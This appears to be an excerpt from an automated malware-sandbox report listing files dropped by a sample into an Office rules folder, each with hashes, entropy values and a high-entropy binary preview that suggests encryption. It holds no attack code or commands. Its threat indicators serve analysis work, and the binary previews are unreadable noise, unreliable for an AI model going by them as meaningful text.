                                                                                                                                                  Preview:<?xml.g.....Z...*...g..}.a..../-.....c...4.......1..;x.ly9..{1...7.{.q.7..#h..}y....J.........G..h4...K..E.gk8.. ...y.EN{H..f.Ks..*\......+%....L9...uFl.U..SKA.Qh.Id&..QeE:]...i.:f.X].9.*.........U.....>;'....f.3..^. u.t<3...0:?.6..Bt.``.7V.b.)\U.....]...^. ...E...p.2?.Q..........M.%uD..1|.vf...pO..."..../....H.Vb4{.|...d.A...e....=...o=".....tDq.Ow+..v/.NW.Q...j.a.NuhxK..X>Y.........""....6.g4.Pe)Y.%....3V.M)...a..|.j.J.~...0......).8.....I.....r...X.}...."c.B.........4p..JBk6..."...sf.8m....},....@.l..i.i.}..O...}...d...6R.2..k...k..V.z/..n...$_?.[..'..... .......L!1.s..........*.b...*...&....4.6..V.a...@.r.Z..y..t.....V=...b/..(z.(1...p-..TD....e.%r...,(8....0.lxw.e..n.z...j...:..%....@.....~"8..'..g.`.O.7.{"e7.G|.......+ ..l.s.%(.........oeCnF....$"<.....8.i..v...j......wX.X...]9..e..G.....}0F.._.H.nl....y..H.&O.3...+z0.T+..8..L7...yj.Bt..OV......]......-.4..@f.bq[Z.\I;a..U....W......b.ywqu....T..3T.TfBp.....U.......z

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.885311038314898
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:wsbLXHVtPQz7BkmhqcBukBG9lzqYo8urpgD:wgLXHVcBkmhqcAkKlOY2p8
                                                                                                                                                  MD5:075CF73BB16E3746F10D3C1C77B1BFFE
                                                                                                                                                  SHA1:295BC3221A39258E59E4E891E2D55FE34BF4473F
                                                                                                                                                  SHA-256:1515134E5836BBA607D9F7C3F57D377687042885CCE3858B9315CFF0687C02B9
                                                                                                                                                  SHA-512:888A10450CB25DE5DF3485278921E19BBB0132EF785BF4654013A327B9AB6E03F5BB7067DE34951268D3045A14AD7971D3FEC316523302A2E4972E38CA4829F3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.|yGF......7...R..... ... `.g\..,U..T2..$.....J.......}>wR..x=.>#Q..y.wj.Gl....|hlm..ob..A..........W.1@..\V&k.[...C..A..^@2.[.4n..W.Z.....8M.`.8&<..-..e..cj....... -?......,Y.xo%...p....f.}.N....^/......bx.v'&u.~.M.w.R...>.SQkM.A..Q8..p...J..Q...H.2.....LNP...Z.o....C\?ieu.b..l.b..^o.....v.lBL' ..XP..!.6o3.6[..u....J...wAcf\~.d......f....@.SS..%....C..K..]h.S..V.c....(4..$......GG..r.P......qR..:h.C ...*.U..o..x?..c,.*..P.`p..9.GD>..........Q=.6...........<..e..e..Z..;.F.O.....y..n.].#l.z........4.p+..tg#^.......&n.\3...*f/...J.\..V..........V..z.;..4s..g..A.Y..U%{..q..&.z.<)."9,....V...J.e...r.....i.../..1"^..<.D.\.i...r..*.8.X...`..<b.X0......Wb..}..Dq3I..)..f35..|.s..a.s.>..3..'.Y..u...?v}.......K...f.z.. ).O...0...h4.W*.J.w...Y...Vp3.D.q.&..S........r..Rj..rb.Y.........y..U...0.(......)..ik..WV..Y.<:..|..Ls..... $.h..vS.Q.u....Cx..VhA..XGk.g... 3g..._.a...tf...vy..j{....11..3..a...L..v\.k./q.Z...!......~.t....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1711
                                                                                                                                                  Entropy (8bit):7.879382677817593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:EIi+OlUIXXItuu3pj9rO0FbmPea9g7++rSowtD:xvOCxbaDgs
                                                                                                                                                  MD5:C5E7FED480C539E3B2854AE18B5F35E5
                                                                                                                                                  SHA1:C99E191E1F789E4E82D8C34EFC73E5232C24D850
                                                                                                                                                  SHA-256:B95D0F4F0D3D5185FBDEE7659F54DBA3A21739F1F85380C21F2B68858A755ECF
                                                                                                                                                  SHA-512:112741A89BFB03F175D1C5428F52ED72F5E0AF6DC84E3E1E5131D9A9510934689B25B2CEFAD186E3A1CEF355FAF65E440B70F1A8E3770659E3ADAE4A0D3C9054
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....N......A;...H'x.3.K....p.rH....PW}^E."m.....!.Rq.....Y?.;!.l.......l.P..#[."..^.!...Ga'.q.E.....7U0".Uo.9*]..dR.6....Z.e1y..........@../........R...Z..p.&.,....k.s.].%P....M..h..(.v+*....T..f.r..@..>..!.K.P......;....E..l.I..R!../GM...R..d7.U.j.......9w....{.].3C S9.*....h.......e..lk'....c....a...61|..........r}.O..RW..f.G.Wif.;.P.T.........&VI..Sp.....A...S.L...P.b.....X......^..n.K1.Z..m.z.......I..59bS.G....U..;..1`.H.P...B.1.]T.'.s.[........L..d.+..w...`m.B.2Y3.G....j.N.uI{...L.]....k...:K\.D. .....B..D..F@G..l!.N...).<.NK......?DfL...7^..d..W.w..Jg._O......C+.H......I.X.i.k&....<5.Qp....OaW..j.=G4.Rv...>.:.......eY.h)...!1.g+v.4l.-..!.Q,....W......L..j.Het..1.%MC.=..r^%.<..s`...5HzH>..}..I......%.E&F/.+.....ABO.P.....M...x......^.t.g.. ....%..]..h....,......X.....yN......-Ri......".X..R..O..V......LL..........@..J......,....z..P?Pi.T.:..0D....be..x.A...X.[>..`..W........sRu'.r.....nXV.K...H...CU...AH.3..Vm4-....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1748
                                                                                                                                                  Entropy (8bit):7.891391492790759
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:w4OlMjxR7BU9pcGe3jurkxhYkZ6KCTjrkWf5urPhD:wb2rFU9pgiAxhYSDCnrtyPJ
                                                                                                                                                  MD5:C3F6BDB4EC3151B8A006D219E50FAB78
                                                                                                                                                  SHA1:75ACD237874D07AAA899DB067DE2A532485F234D
                                                                                                                                                  SHA-256:0821927EF8D73F7073C6292B07CFF06C3AD54562FD6AB005303CDA5E63F1A025
                                                                                                                                                  SHA-512:946C24960F7CF08DB0D65C86571839EAEB6B36993C0B095CB1DC18D2F84217118BC80FDD788411A6F4D3202C5AF08D37C41B82E41BC67FF1A3EF0A40ED0E76A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...._..s..G......F...t.CL.B-j}.E....{..x&:...b.{.... :?A....[{......G.P..p.o.X..*.n..7......).l..[l....:.s.w.FSj."...H&...E.*A.>....C..!...\...\).]d@.T.......^..`.o.../J..?..i...,^.._8.s..........r^..$......'./TI>~...z...iO..U.M.!...I>..h...{..~..Y..f.>..=?...Q.!..N22.ylK).m..g -.[`....'>....z.qy\2.r.Mk ...M..N....;xb.`.`@F...:..z.1lG...m9U'.]..t.-v..9n..B..X.].,.y......(zP..A...5...E.y..8.=./.....$.j..tjg.....n.'...W.=DB..`!5...U{.=..]...{...A..'.....o.J.....n......R.n.....z.....Gf..j...V?....U.P..S...%.....,.../.C.q7L.#.T.f..(@....x.. 4...b%m.=vj#.....BK...T...G=n...)W.}.........(...R+...?kq$.0t.6....j&.x.8..;.2...[...-..r.Uj...n(...&.Y.Dd=..B...hRw..I,$(.X|^.s.W.sEY....p..SZ..X.%......._+......x..R........K......?..Q-K~.0...~Z.%.......D'v..Bh.L.....]@..}^.a............l.n...7.....C8wq..h$..-.t..%....".9..Pq*.F..gJ}.3Rs.......9..;q...`.T..8C...[m...0\....Z.l... ?\......_....._..[[..........fPF.M.<.....`..Jq....c..<..}.....+..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1711
                                                                                                                                                  Entropy (8bit):7.8894450564214385
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gcGqHE1kqiX+1fFL1NpVt9+zq2utfslO1JD:ghaoKX+1Nrpv8Ys+h
                                                                                                                                                  MD5:8EDC4A7762B16EDCBCBD36ABFFA899B7
                                                                                                                                                  SHA1:FE7E98BCA8573F398048F23BD4BB5E97828A8EF9
                                                                                                                                                  SHA-256:7002BD0EEC29A00623B4CE92B71B545E9219C6B3A56E257B893F187A58B896EB
                                                                                                                                                  SHA-512:28439C7FBAAA58DD5F75604CFD1B29CC40A6EB9015C117A927D01DE3C969AD093BFFEBE26939A7E5D3902E5FE5A3396BA2B7B6AB79DCAB2F9AA9260614EDCD0D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlX.,_.........R.H..FH.&......0..{) ...`..4dR.y3.G.)..'...q.......c..v9*..k...f..'}y".U..Vz.S...._2N7&Zi..?........C....M.cY#NE...^.R..g.T~Fa.8..A.....7Q...I........#.'...s/.......N@ET....z..:.'6=.".j...4F."0.`_..Q]izw.+\^u..|^..q..\`.O$.......=8....8.7u.Q.N...r..ry;.........v..zL.X..fF.a..%.Z...R.M...(.......0}u4z.*E...._.B.p....v9.,h..y.h.....p*.%a.....c.J.r...|.....R.5b%(0JJ,a<.o.5lK.<.^..SO.c.....?...D.%..;L .a.?.].@>.cv....=Z.....t.}(.F[eh..~.Z...{..6.T.5et....ti,T.R...a./.....PM........$.Kb....`....&.5*....H......@..O_........<M......5}.Y......w)..H....^v.."..C..oc;.p...B.....`....V.A..De...g...j....3D..G..!..:.D.M.G.<.@.3.3..F....#....P.....W......b.....~..@.0......myB...h4qc.x..O...Z..T...zd.....\....8AAT7.I.0Q:.eg]7;.Qt..3.<R....a>,!.v..Ds..8...Gw..].W....*.r.....i.;QFmu^.0%AL........"l... .=..l./.~..pxh...K=.....S.VM4`.....6<.a7..5.waE.`.5..[..1 ..............M..5."...6...4o.Pz.........O.,!f...]S..6...X.dt......5.#...Qbe.d.79iRJ

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1748
                                                                                                                                                  Entropy (8bit):7.897013608916129
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:WgzQQ3JjZ7pbbieVli6uR4WAjsDWUP5hXvICYpcD:W+QwdM6uaWlaUnXQg
                                                                                                                                                  MD5:8FDBA37E6E83EF8C7BE0F528E33CF0E0
                                                                                                                                                  SHA1:2C58AB1D00CFF9ABC855FC38B1F9E98024CBDE79
                                                                                                                                                  SHA-256:A120234046C5CE9E753CA96A7C9544AF22FB0B31C5439D6B1A8486B848E71C11
                                                                                                                                                  SHA-512:318B67E3B53FBC6A8AFB9AAD2DE03E4C5B80CF25FB6DF1BA9E71E08FE0CDCEB328C91F0FB49797B9FFD157EDBFD4CB1A4215DA997EB7C9E184171053D65C0E22
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B%jB....i0L..-.!...y..:"..2...r.....=..e..A.7.O6G.m.|f...J....5J.....+8..?l.J.....L....m...W..#b..Q>....l....w..7.....4.w.........J..yk..NS.n..=.%....>.X.pL.S.Pc*.V...]..V8..N.Jv..e\....x..Nw....c....-...{. .`...>!g.. .Be...$....&"{#...'.....>..X.....L.(..p...s9Z].O.3.B}Y....H...?...rb..k..E..$.^o+)z.7..b....J.......G./.....Z.H=#.7........k..X....}...k-...e.3;Q. .....'Z....Vd..M..i...N..t.vL....DS....F..a.'.7%.b.6f.g.aZ(^&...o?Z.r......9......dk..N)=Y..i.5.....@......k\e..X*@zs.@.....Y.7............|..nS.s.Q.}..l..Q..u..X.+-....~.....+\[.)..Q...g.g..p.zb*W..i.x.|B..7op8M[.M%..\P....kC]d0..4..0.F....Z...F?1o.....R..=......d.?.....?./v...C..K.).....v..u...&...._.(E.a....v-.,...uPJ.....T?.8eA9+..&..#....].96!m..S"n.I...D....Ch......b.g gG..........U.A....)....+T...{....(7....m.a......s|.cx....+..A..........O.'j.QQ"58Ys)..c6F/.q...2CAu+Nm.8b.N..{.C......af.&....q....-.M......./N.l......P}.hdJ..k...W<..K.{..C.n...;.\.!7...... 0.....c..Z;.l.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1705
                                                                                                                                                  Entropy (8bit):7.908477821661773
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gFLbw5xYLPgelyYYN/jSxL/6I+Mc4e1BRY4TeO1qTCgtcebo3y51/vqwyvVJ72bD:gFLbw5yselyY+LSYVGSBLGE3IKxVWD
                                                                                                                                                  MD5:0DDFCB742BD757ADEB9F06C3FD1039CB
                                                                                                                                                  SHA1:4918D10C277421B6EB156E8E0A4C6E539D884738
                                                                                                                                                  SHA-256:F3A7B700C5F6EF79EB5AD173A0E6D87FFBBC7E0BB4792D842283B03FECB6AEA7
                                                                                                                                                  SHA-512:CC11F7765E9C18AA8103940198A5512517DC51F6B1F0E8C01E04E578313581BC3420093CA0F20DC1D29F9CBCFB26A1CBBD6978B6FF9435850E5846C8062090FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....679.V..(p...*U0.VN ..bF...sxd.lMu...D.h....l,...K+v.sC..p...B\i.l_o.....jA0e...6.0.l...H...k.\).....F.....Y.g.u<...\.....i.(.s.'%I.>...W).9..l.........h..6e..t.i....n=A.r.....SE/...+.n..x......[F!.J b.....{.8:.=...0...C......T.w.uat..&._.}..Q...kW.t..~.D.._./..G.....?....(....|..K..|.r.$..8V$.=..:....&.....8|:z.>.....(...ag.~.XZ.|..3..."t....L....}|..$*..F.$.....wDJH..W]....L.u....{w...YF....'L.(.P..C..O..so.3.;-.p.o..D.x!.!P/Z~..8p.K.....X.[}<o.5...._>:.3.$...FW!....%..j.p.@X9pu.o....l.S.0-@...d..W..et......Pb.X.y..O..AW3......'..w#.;s\o..;..R....W.XF..AHd.^.....)J..R.eD.F..|e15*.............6..bEDh?.V>..- ......NH..f.......Q...iv......q...Y....-klk;}..w.h....g.vc.,1.;...+]..H.O.B|n h....<2..f..*N/....v..[..a.. ..Y|M9.b.o.4...Q(...^.'.A.%..Q...sC..!..8m7 ...E..fkv....o.....!....@1.....rb.'..9}.........%...R[....T.../.Y.....my..ROf..v....`....h.h........@~Z5..4%(.N...F....hn....'...w.[..e...........].7.ih.U.S....k....^&.G

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1742
                                                                                                                                                  Entropy (8bit):7.8753879145607435
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vZzo5oChzMKWT4309Q+oRS0ResLZxcTZG2fn6R+WMD:vZQhzx03oRkTlRf
                                                                                                                                                  MD5:F6F9548F121E492C759B82152494DF01
                                                                                                                                                  SHA1:D0D53FDB1DF1DE3E8E30F8970A0DA9A45C0584FA
                                                                                                                                                  SHA-256:6DF05BF614B58F306CB22972A8025F8D03820E8587A27747677D88308471690B
                                                                                                                                                  SHA-512:D6EABDCF198A4182B19DCD2CCB2D3C9D33E938E3F8C459A9E759BFD701BE023BE3FD976EF599EEFDF35668D43BBE63167EDB1E63677DBA82A852F89ACB095129
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmll;@.p...UWd.u...<s.?.I......A..0.....c..........@.$.y....Q..`M.8.p6....).......D.>*.e...q...);.~f.)..v2d..vW;.p...^g9..dt..H5..%..6.>..1TD..3.E..G\d...>....+.(;..k.'.~..X.8...$.3...{.YKY......^..e.y....L..A.$....D..TL?.D.....}....$...S......>u.M...H.?..K...Q.t./.....f.....79 ..^9p..9..........f.K...s.7..V...x..XB.k.9.~;...{.s....l..g.2O.1...S..J2..".p...u3?.+|......5....Pm.Y^.>..|P.`.+'.6.V.}..d@WH..&zG/.G.'.....e.2..S!....... .-Pw...x..nW..9....|j\i!...Q..Q.m'@.9w.(.Z.....l.*.{n..Q..+9.#y.w...Y{Y..)|.#e<7a.%....*IGN...d...i..c...*..G..hQl&..&W@..D..^....1ku..<s... jc9p.eJ{.1...g)......2]......iLn}}....-O..X].1.`k.sW..cT$......}v]..2dL.7.d6..V.*......7VE.)x$.|..h......>...o..k...U.;.r..lx.......3.o..m.,.<.F.....k,...E...g.x......L]..j.ufI....1...u.<<...|"f.K..=2..6A$...[3...nj#/$[W..j.._..s........]u...K.f..S..;..Z6...!.lz.R....nQ.m....(.F...Y.|".,R..$L..l....8S.o.;......$..tY.........^....k=-.....d*...^.......-{.;d.......P.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1691
                                                                                                                                                  Entropy (8bit):7.885400879888139
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:iwqJVUUbO3n2Dy9SEbz+mt6Hbo7hrhFWXfoHuE8K+LFID:iwCTbJ+z+m2o5hFGUutU
                                                                                                                                                  MD5:528C721375E85D579379DCFDEF487EF7
                                                                                                                                                  SHA1:B0394ACEF34C13F650129ECCCAE239E47133DF27
                                                                                                                                                  SHA-256:1C94FC2AD4D568EA48AA396A54C70094FA5D6BCE192FFF03F021AA465727B73B
                                                                                                                                                  SHA-512:E260F108CE77A665E2223EC5632F33C80E3F7095BAAD126F5F75A5E1D109372EE459BF75D3E75A30B3F259A18A00C1D1BF0568C2B65A7774EA0AE379FAB04971
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml(.........X...*..[.R.P.G?g.G..."..T....D..va...6..R.|J.y7....?.Hd.|@....mF........qj.Q.-~9.W..l[3=..4..#7{1.9r.._...3.8..?...be.^)...F*..d.)u.:.K.;=..b..........f..;.....dsn.q...Q.../a.>sE..?.....K.......WR.ltL......p#...Z5.6J.d..W..6.A...V....|...2A..;..Sb.3...[..?.o.em1(...O.4.5W...M..(............O.....8X.#....>.._,.w.P.....X.;f..... z*.".g.VQ:..$.D.Ph.6.6H...%!.e..G(...(.-=..X........1...&n.K~....@2{m.....V.p..{.<...6h..`Z.PJp/....Y.1$..j..;\...Z.Zd{t4s...T.,..".p......G...O.'t..?..?...6..?T.4N.p..X..\c.R..$.Q...F.....^...I.q..!...~....uI....?..af.R4.......T..HC..ii..$(&..Ef.m..Pma..W..).Z.....p.....[-..gOs......rA)...47..l..z.......Da.}...!.EQ..S.....f.=b....[..;.......H[b..U.....Nr...C|....(P.(.K...2..=..wu-B.W...r.6....=..'W..X.J...F...Fn.Ob.<.'....Exf..Si.Wl@..Jc5..b..$.&.[..b.H......#N!7..s....+KaN_.=!.a.1.%...s\....G....N...~.XeB.Y..<.c.T..-.-.,[....9p..+....6.Uvn.,.....rz.O..K..@;...G`2E.qF.z..'.c_h......HX6..e[I..e...h.G.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1728
                                                                                                                                                  Entropy (8bit):7.886609142278559
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ilWP2KgZhjnHDAjUwCPc+Fdjhwwb+hMof7dqgYd6D:ivKW7Dr5Pc+Fh+bMofoQ
                                                                                                                                                  MD5:7E596C3F52F5E8AB1DE5713D5F06B2FD
                                                                                                                                                  SHA1:EBAFE865A27ABF1043B05BEC9FDEACE26D01A6C6
                                                                                                                                                  SHA-256:2DA14D3ADADD2D6F21EADA3136E0A621424A294CBD2AEE0614BF5B173F2AF763
                                                                                                                                                  SHA-512:03F8CF41DE8543B8FE34FF55EE43693167946A8CCF56EF82FEED4BC0B85B1A0FE891E5F66A377601ADADB20EC5123827FD0CF1A1FD2B03C91E1BD9CE28519A78
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml'.w0.<..:..w|..b.?......,4.j..YI.._-.........}.|r.n....&'.....x..B4J...p..VzR.#E.e.J..}F...K.....[.X...i.Hs.!s........!.us+V.X.3....IA..:@R....%./X.....C....?yl.d|...bT.~.r.8..p...........jk..4.W..m..%56R':.......,.......B..3..P{<...m_..$..i.I.rm(.....G..9@.g%&.+...e5.Y0..qb..|.4.F.....w...../"+..J...q...*..#...|..'.,..6.#F).\b.....L...z..v....yq.o...4vO.......}Us..e..^x..v.{.0.m..?..6..........~..s.....TlWL..?~.s.T.^./.q..>...}.M..O/..wns...\43.|a...%.cd.N..]...S......N.K.....f."...!..,...z}.T..K.h...Kx....0~P..Muu.2F..+!.t..."..N./...}.p..q..D.88...n.K..g...|hq.O&......sox[...6.......E......|.E..f..tf.'.V..#.V.=[9.D.ai<...E..4.X.....[..&y.(;..`...[..R.;..;. ......w..A..U.f9.A.z.?..C .-S.%.....U..s....b?...9@.k.KcN....10LU..:...dEC.8..M.?..2..7f..Y.|.x.I.....7>e!.i.X..P..........m;..],X.Yd..F....~....P......Ip.sl....z..gF...9..B...,Q(...m.....fzP.$.~...Q.."....U{4..^.u ....&..*K.."....)9,:.5T.#. #...B..aP...LEW..E..z.._.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1700
                                                                                                                                                  Entropy (8bit):7.874813791647123
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:i8Uaq4RJ0cEycSi1zQ0QKLagVQFgonbbP46D:i7U0RycC0QKubgon1
                                                                                                                                                  MD5:B7F6A59FD7FC65057DE09CC269A4B6F8
                                                                                                                                                  SHA1:CBD73575E835D5D4D3F6ECAB2A0B417A88561F53
                                                                                                                                                  SHA-256:198C1851CFA10483A30F1D3FD5D43607AEDC7F316A0668F9FACB8254EB8C0A57
                                                                                                                                                  SHA-512:9D9E8FE43033FE0A7E7A7F2E41067338DAFD1034EB797E3790589609656A402D2E49F1CE51CB4266F290465F4892FA776B16710D1765321A1F5DD812B2774D02
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.+x.[ ......&.....:U..jVi.N...C..'A.^...U!.].....B~.._.Kw.....V.NF(Eiyq.??./O9..f#+ro..C.ad.<w....KL..@....;...W.o....lc#3.....%M....B<..D4.c....P....V83...!.dt6gFi..K`..c(Z.f....v..S.OP^.b!Q...=-.$..v.Sh0..T..<.dr9......j..........1.....]..Hg..L.~X..3.P......S.K.n_r...<.....e.P.g.q{..eMA.J..I..#.H.@d....X..6.0o.5Q.=[.@'..0X..........`...!D..<....#b..j..<..Z.vBJ4.~,..e.Y.m...aY......)=.M....;..)..g.F..:........}...].....@...R.........bp..........h..w..XT/...j......D.!.4...F...Z......z'E}.Sw$6s..X..8.!\[Ba........lx..}d...Z..-.~.u.Q.l...D.V..}.C.QA WoT....?3.C.AJ.@.o.....Nh.[..u.v=p.l.....Z...]!.,.S...G.'7....y.'4...<.&A.%m..i.(.A.M..!.07..............V.$....B2..h..?w...[RU......nW$.~~.>L@C......2..%..*.`FD.Q...;..e......c.j_...S.N....fNNJ(`........]..=..7......o.gi....C..v.......8.e..m.&..m.n.c. .w.....u4.k.i.".h..,L..m..3.O3WH.Z.CL.N..S..~...]m......;RT.....0.f..ez.3..E(.[.C!.Gf.l..\.pX......O....=...U.j:....W......~...TVp..G.Vo}R..)>

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1737
                                                                                                                                                  Entropy (8bit):7.880614839000691
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yPKy4AoC/gnJLdM1fNdPNgT1HzAhFOr4WbUOocucxFO2z+KEMyciZgVaQwIkq8Pw:yi1ZJLksIcd+KE5PgV3wDqND
                                                                                                                                                  MD5:EA6D9EAD5BAA2986E777A3A8F4D46110
                                                                                                                                                  SHA1:CE50B37B116DD98FF787C495BF2797BF1B937C46
                                                                                                                                                  SHA-256:5E9CF9E52403F976C61C5FD9532ADE1A0B5FD6F4430860CF8FFA53A7647DB7B7
                                                                                                                                                  SHA-512:4520C431E8731AD3E933FECB72E75CB90E78FE1045CF9ECCAE209D3A12B81A6EBA8103733C40588BF2935B95D04BB930B31CA4AE38E3D4C2681C6E3F23AB0C12
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....+...-\c.......'5B...k....ct..Y..8.}~..(g.-lv....%..U.......Z.&q...~.r .Av.2p"f..H[..._.T....hR.y....U..q4..SrZ...`..FD..>.1#....oU=..g..<.."F..|=A.brs.;m.X;Hc.....t.S....^._..q.....D..q...%.....=..........@.4...........#$WI....#.....n.\(......MIk...Ir....1fV.#.:.*a..%%.d...t@.....j.....@.0.........-..6s.h.1..J.'..%.....%a..OX...........=......C_....I.6......\M:.2...2mKT.*..O._...Ra.6d(s........P....*...i..d...-J-..pm.?A!}..a.].o..l.u.O.G.N..xU.....L.;q.).kYq]..W...rHdJ...........r.*...@|...;[.j<.w..}V<[..x..ou].M&@..@T.U....Y.....^.G....7$..,JZ.!.h.A.|..:.u...<k......9.M.]...a.6.Ct.h3^>..%..h.y.Q.S .^.0....H..;.B.c7.L#Em..ZH.......a2.n.W~../..N.o.xA_+U..i0...i.....V.v......M....0,G9I..9>..,U`s.=.a..E.E..,..Q....FK.,Uo..SH~.(.?M...}.._p..S3..|"x[2.j.u.`..7Q..1........u..p.Sk....E<.\xw..O@...u>.rl.N.c..7.1Cj..............P..{_....o.d_....S..o.K..wu................h.r........h..{.4P....7r.g-..i.O)...D..;..EJ#..X...R.}ZO..Bc....H...6..#.q

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1699
                                                                                                                                                  Entropy (8bit):7.888205599169395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:20MdbJDZc08cqd/1gsVYq/dkKNKnQFUgjSD:hyorcq91JVvdXvZ6
                                                                                                                                                  MD5:B0E30C1FDF1D61F6252B0A52F2A4E36D
                                                                                                                                                  SHA1:755D75B5CFEAAB9F38263F73D90D6FD303FB6D0F
                                                                                                                                                  SHA-256:42A699A156BB5D716E6AF56A7834726D995962F1ED26D947AC44B2D69748E6C6
                                                                                                                                                  SHA-512:75349BAC463E51146E9DB55BE57C341D819A9961C34DDEA217E78FE41C03A9C5697130EC65E569500E187801D8A462EA50CF46FAC2A95D6A0DF7B715FF1FEBC0
                                                                                                                                                  Malicious:false
